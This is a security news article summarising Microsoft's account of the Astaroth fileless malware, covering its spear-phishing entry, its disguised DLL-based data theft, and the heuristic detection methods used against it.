'Great Duke Of Hell' DLL Malware Attack Uncovers Vicious Astaroth Fileless Malware Threat

Microsoft recently lifted the veil on how one very unpleasant fileless malware that works to steal data without ever having to be installed on a victim's machine – Astaroth.

Named after a demon of the same name straight from the occult books 'Ars Goetia' and 'The Key of Solomon', said to seduce his victims through vanity and laziness, this malware has been in circulation ever since 2017. It was mostly used to steal data from South American and European companies in targeted attacks that used spear phishing as a point of entry.

There is something that makes this specific infection unique, according to Microsoft Defender APT's researcher Andrea Lelli, as it has the ability to stealthily infiltrate under the detection methods of some traditional antivirus programs.

According to Lelli, Astaroth is notorious for information stealing of personal credentials, keylogging and more, data which is then exfiltrated to a remote server. The attackers then use the data for financial theft, selling personal information to other criminals or even moving laterally across networks.

How Astaroth Infects Systems

The attack usually starts when a victim opens up a link inside emails made with spear-phishing in mind – a social engineering tool the attackers use as part of their operations. This kind of scam aims at opening the link, which opens up a shortcut file to terminal commands that end up downloading and running the JavaScript code which makes the infection possible. The script downloads and runs two DLL files that handle the logging and uploading of harvested information, all the while pretending to be legitimate system processes.

The procedure works well against signature-based detection tools, since nothing but the DLL files gets downloaded or installed. This makes it so there is little chance to scan and catch the attack in the process. This approach allowed Astaroth to fly under the radar and thrive online ever since the late days of 2017 without the usual reliance on trojan downloaders or any vulnerability exploits.

Fileless Malware Detection Measures

According to Lelli, the traditional file-centric antivirus solutions have only one chance to detect the attack – during the download of the two DLL files, since the executable used in the attack is considered non-malicious. The DLLs use code obfuscation and they vary between campaigns, which means focusing on detection of those two would be 'a vicious trap', Lelli added.

Microsoft and other vendors had to rely on heuristic detection tools, such as those who closely watch for the use of WMIC command line code, applying the rules when any loading of DLL files happens. Checking the age of the file, blocking newly created DLLs from running and similar tactics allows newer security tools to catch up to fileless malware.